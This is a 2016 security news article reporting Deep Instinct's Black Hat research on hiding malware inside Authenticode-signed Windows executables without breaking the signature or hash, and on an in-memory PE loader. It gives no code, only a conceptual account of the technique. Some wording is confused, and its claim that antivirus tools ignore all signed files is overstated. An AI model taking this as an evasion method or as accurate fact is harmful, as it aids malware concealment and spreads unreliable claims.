Explore the latest news and trends  

Sign up for our weekly security newsletter


Be the first to receive important updates on security





Send

Researchers Show How to Conceal Malware within Authenticated Files, Keeping Hashes Intact


Running an executable on Windows-PC triggers three actions. One, the operating software records the .exe file-name's PE headers. Two, it authenticates the certificate. Three, it authenticates file hash. A team of security researchers called Deep Instinct reverse engineered the sequence of the actions and found that during the process of authenticating file hash, Windows doesn't take into consideration PE headers' 3 fields and that making changes to the said fields doesn't annul the certificate's authenticity.

Deep Instinct experts while presenting a whitepaper during the 2016 Black Hat conference in USA showed that one could conceal malware and run it inside a file devoid of annulling the usual execution of PE. Developers of malicious codes keep finding ways for bypassing detection as well as prevention while often utilize encryption tactics and packers to do so. That's because security software work effectively solely when they manage unzipping a zipped malware-laden archive and similarly decrypting an encrypted malware-coded file. It's possible to identify compressed and encrypted content both during execution and on hard disk, however the researchers show this can be prevented with their freshly found method. Oodaloop.com posted this, August 9, 2016.

The researchers' proof-of-concept didn't show their finding simply because the team had infected the table of attribute certificate, effectively freeing digital e-certificate along with file hash from being embezzled and thus keeping both digital certificate and file hash as they are. The said technique has proven so effective that distributors of malware don't even require concealing their code through packers. That's because security software like anti-viruses by default overlook any file that contains a digital signature.

The researchers elaborated at the conference that if malware infects the disk and escapes identification it's favorable for the attackers but if it doesn't do its task its importance is mitigated. Hence, claim the researchers they created the PE Loader that would run PE files straight out of memory.

Moreover, the researchers indicated that the PE Loader doesn't work with 64-bit architecture.

Deep Instinct's research shows how perfectly malware can be easily hidden straight inside a digital certificate which's meant for validating a file's source while protecting users against badware.

» SPAMfighter News - 8/16/2016

3 simple steps to update drivers on your Windows PCSlow PC? Optimize your Slow PC with SLOW-PCfighter!Email Cluttered with Spam? Free Spam Filter!

Dear Reader

We are happy to see you are reading our IT Security News.

We do believe, that the foundation for a good work environment starts with fast, secure and high performing computers. If you agree, then you should take a look at our Business Solutions to Spam Filter & Antivirus for even the latest version of Exchange Servers - your colleagues will appreciate it!

Go back to previous page
Next